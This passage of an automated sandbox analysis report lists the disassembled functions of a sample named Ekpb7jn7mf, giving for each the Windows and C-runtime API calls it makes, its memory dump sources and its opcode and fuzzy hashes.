                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind_wcspbrk
                                                                                  • String ID:
                                                                                  • API String ID: 2190230203-0
                                                                                  • Opcode ID: 39ea26712d5ca65ab045286081f21ff3b2941b1a2c09988302a67c024bc4b7b4
                                                                                  • Instruction ID: 7878f6d5e33578875329d5721eebc5f6fc2c64fa75cc553fad57c447ec83d0bc
                                                                                  • Opcode Fuzzy Hash: 39ea26712d5ca65ab045286081f21ff3b2941b1a2c09988302a67c024bc4b7b4
                                                                                  • Instruction Fuzzy Hash: 34F09036005380AACA226B758804BCB7F955F55335F048A1EB1F8721D3C779189ADB6A
                                                                                  Function 00406FBA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406FBF
                                                                                    • Part of subcall function 00415380: __EH_prolog.LIBCMT ref: 00415385
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: de15e8dc75b4bd31bcdafa08aae457da7714568970e2e6915e40c43a43641d32
                                                                                  • Instruction ID: 106a3ede041e0e9e37d9b754b64534ee1dc51bc7015f9c7dddf168db923a4940
                                                                                  • Opcode Fuzzy Hash: de15e8dc75b4bd31bcdafa08aae457da7714568970e2e6915e40c43a43641d32
                                                                                  • Instruction Fuzzy Hash: 98E092325116109BCB19AB29D4027EEF374EFC0728F10036FE432732C1DBB86D418659
                                                                                  Function 00409640 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: c7a22f7798279a6f7519e1e5fc0ec24188ae8916def0818a0b6c4e85bab034ef
                                                                                  • Instruction ID: d642d3f8287545d7ea58b2778da428c31f7e4de34155637f5aa8441520eafd07
                                                                                  • Opcode Fuzzy Hash: c7a22f7798279a6f7519e1e5fc0ec24188ae8916def0818a0b6c4e85bab034ef
                                                                                  • Instruction Fuzzy Hash: C5E0CD7190474039E321911DDC04F57AAD84B91724F14CC2FF189A72C3D1BC5C41876D
                                                                                  Function 0041EBA7 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041EBBC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
                                                                                  • Instruction ID: 38f121e58b7adadffe473ae12edbf1895aca69ad112a4ea178b6eb37c437d7d7
                                                                                  • Opcode Fuzzy Hash: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
                                                                                  • Instruction Fuzzy Hash: F1D02E3A6443085AEB109F726C08B323BDCE3843A5F000032B80DC2180F230C4908508
                                                                                  Function 00408B7A Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNELBASE(?,00408BFA,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408B86
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
                                                                                  • Instruction ID: 1d77a9bd8de83f147cfd22e66b227f25cb911925b8e818fa8ece2c974cfb7da4
                                                                                  • Opcode Fuzzy Hash: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
                                                                                  • Instruction Fuzzy Hash: 43C012F151010052CEB046385E4805B376697433667684EBDF1A5D11D1CB39DC42F005
                                                                                  Function 0040D3C3 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0040D3E0
                                                                                    • Part of subcall function 0040CFC8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CFD9
                                                                                    • Part of subcall function 0040CFC8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CFEA
                                                                                    • Part of subcall function 0040CFC8: TranslateMessage.USER32(?), ref: 0040CFF4
                                                                                    • Part of subcall function 0040CFC8: DispatchMessageW.USER32(?), ref: 0040CFFE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchItemPeekSendTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4142818094-0
                                                                                  • Opcode ID: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
                                                                                  • Instruction ID: 3b13af5d56a39e5f22369b2d9f50570f7d85299dd9acab15ffa417331e8d843b
                                                                                  • Opcode Fuzzy Hash: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
                                                                                  • Instruction Fuzzy Hash: 0AC01231240300ABD7117B10DE07F193552BB40708F508139B744340F1C5B648329A0A
                                                                                  Function 004214B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _doexit.LIBCMT ref: 004214C1
                                                                                    • Part of subcall function 00421389: __lock.LIBCMT ref: 00421397
                                                                                    • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 004213CE
                                                                                    • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 004213E3
                                                                                    • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 0042140D
                                                                                    • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 00421423
                                                                                    • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 00421430
                                                                                    • Part of subcall function 00421389: __initterm.LIBCMT ref: 0042145F
                                                                                    • Part of subcall function 00421389: __initterm.LIBCMT ref: 0042146F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1597249276-0
                                                                                  • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction ID: a641cbc9880caa42f80c5c55f80c2b4a079778160b429ae487eec97669a62b75
                                                                                  • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction Fuzzy Hash: C4B0923268020833EA202A42AC07F463A0E87D0B68E650021BA0C195A1A9A2B9618189
                                                                                  Function 00408B67 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNELBASE(?,00407FFA,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00408B6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File
                                                                                  • String ID:
                                                                                  • API String ID: 749574446-0
                                                                                  • Opcode ID: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
                                                                                  • Instruction ID: 8764dd92a4aeea9fc6a797bc89121622734c807ffe49c2e46d1e29d47898f422
                                                                                  • Opcode Fuzzy Hash: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
                                                                                  • Instruction Fuzzy Hash: 45B011303A000A8B8F202B30CE088283A20EB2230A30082B0A02AC80A0CB23C023AA00
                                                                                  Function 004199FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0040D795,0042A644,00000000,?,00000006,?,00000800), ref: 00419A01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                                                  • Instruction ID: 175a8f5435bd407339ccdaf5ebd2187c03bf393c5a072438874265726e840e79
                                                                                  • Opcode Fuzzy Hash: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                                                  • Instruction Fuzzy Hash: 98A0123039400647CA100F34CD0A82575505760B02F0086307006C00A0CB304430A505

                                                                                  Non-executed Functions

                                                                                  Function 0040DD0E Relevance: 52.8, APIs: 27, Strings: 3, Instructions: 291windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0040DD88
                                                                                  • DestroyIcon.USER32(00000000), ref: 0040DD93
                                                                                  • EndDialog.USER32(?,00000006), ref: 0040DD9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyDialogIconItemMessageSend
                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                  • API String ID: 3309745630-1840816070
                                                                                  • Opcode ID: 5e139d720a9ebed7bd3f1c1d003199c373304d34a840406cf30bca9b4f5c3397
                                                                                  • Instruction ID: fa0b8f752fa8c0d846640355b86fcc42a38a471cbb23b859a5d7e6fa7d0d957f
                                                                                  • Opcode Fuzzy Hash: 5e139d720a9ebed7bd3f1c1d003199c373304d34a840406cf30bca9b4f5c3397
                                                                                  • Instruction Fuzzy Hash: 4CA16472A4011CBBEB21EFE0CC85FEF776DEF04704F400466BA05E60D1D6799A598B69
                                                                                  Function 00406894 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 290fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406899
                                                                                  • _wcslen.LIBCMT ref: 00406902
                                                                                  • _wcscpy.LIBCMT ref: 0040696E
                                                                                  • _wcslen.LIBCMT ref: 0040697A
                                                                                    • Part of subcall function 004064DD: GetCurrentProcess.KERNEL32(00000020,?), ref: 004064EC
                                                                                    • Part of subcall function 004064DD: OpenProcessToken.ADVAPI32(00000000), ref: 004064F3
                                                                                    • Part of subcall function 004064DD: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406513
                                                                                    • Part of subcall function 004064DD: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00406528
                                                                                    • Part of subcall function 004064DD: GetLastError.KERNEL32 ref: 00406532
                                                                                    • Part of subcall function 004064DD: CloseHandle.KERNEL32(?), ref: 00406541
                                                                                    • Part of subcall function 0040927F: _wcsncpy.LIBCMT ref: 004092E6
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001), ref: 004069FB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00406A0C
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000001), ref: 00406A19
                                                                                  • _wcscpy.LIBCMT ref: 00406A65
                                                                                  • _wcscpy.LIBCMT ref: 00406A89
                                                                                  • _wcscpy.LIBCMT ref: 00406AD5
                                                                                  • _wcscpy.LIBCMT ref: 00406AFE
                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406B24
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00406B4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00406B5A
                                                                                  • GetLastError.KERNEL32 ref: 00406B6C
                                                                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406BA1
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00406BA9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CloseCreateFileHandle$DirectoryErrorLastProcessToken_wcslen$AdjustControlCurrentDeleteDeviceH_prologLookupOpenPrivilegePrivilegesRemoveValue_wcsncpy
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 295717069-3508440684
                                                                                  • Opcode ID: fec5147fc01d9f34a502e68caa46c748142a0b958b89c88ea65a7e80bfc16d33
                                                                                  • Instruction ID: 45f9c9a60937e065ab61df6fe3d998c353ec3866802773e54f17ef37c5d24b46
                                                                                  • Opcode Fuzzy Hash: fec5147fc01d9f34a502e68caa46c748142a0b958b89c88ea65a7e80bfc16d33
                                                                                  • Instruction Fuzzy Hash: 05B1D371A00215AFDF21DF64CC45BDA77B8FF04314F00446AF95AE7281D778AAA4CB69
                                                                                  Function 004104A9 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 225COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __byteswap_ulong
                                                                                  • String ID: 8Z@
                                                                                  • API String ID: 2309504477-3820067188
                                                                                  • Opcode ID: 9f117c7e7c4f073d62743699c9974dacf17771ceaf79ce7deef3240e054eaf93
                                                                                  • Instruction ID: 860ed8aa975c420535b50c32d487b6e313711c98d635ade82304f14efeb4dbb3
                                                                                  • Opcode Fuzzy Hash: 9f117c7e7c4f073d62743699c9974dacf17771ceaf79ce7deef3240e054eaf93
                                                                                  • Instruction Fuzzy Hash: 8C91FAB1A006048FCB24DF59C881A9DBBF1FF4C308F0445AEE54AE7722D739A9958F45
                                                                                  Function 0041E48E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00423CEE
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423D03
                                                                                  • UnhandledExceptionFilter.KERNEL32(`D), ref: 00423D0E
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00423D2A
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00423D31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID: `D
                                                                                  • API String ID: 2579439406-1070873967
                                                                                  • Opcode ID: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
                                                                                  • Instruction ID: 2015641654b75937153e36d01346c21e17e79de6d81aa9230b99b4eb3045d80e
                                                                                  • Opcode Fuzzy Hash: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
                                                                                  • Instruction Fuzzy Hash: 4721C078600244EFE710DF26F8456547BB0BB1E314FA049BAE80983361E7B5599ACF1E
                                                                                  Function 00402F24 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 544COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp$H_prolog
                                                                                  • String ID: @$CMT
                                                                                  • API String ID: 212800410-3935043585
                                                                                  • Opcode ID: 289be22be8d8e21ea6c2de34b842591e7535171eb9dfa8655e80555d37c1e7ab
                                                                                  • Instruction ID: 74599023937fd8df6c33bc0beffbe5af872e8d8d66d8c1774feb90eaf4e5afae
                                                                                  • Opcode Fuzzy Hash: 289be22be8d8e21ea6c2de34b842591e7535171eb9dfa8655e80555d37c1e7ab
                                                                                  • Instruction Fuzzy Hash: 672206715006849FDB14DF24C881BEA3BE5EF14309F08047FED4AAB2C6DB799689CB59
                                                                                  Function 004064DD Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000020,?), ref: 004064EC
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004064F3
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406513
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00406528
                                                                                  • GetLastError.KERNEL32 ref: 00406532
                                                                                  • CloseHandle.KERNEL32(?), ref: 00406541
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
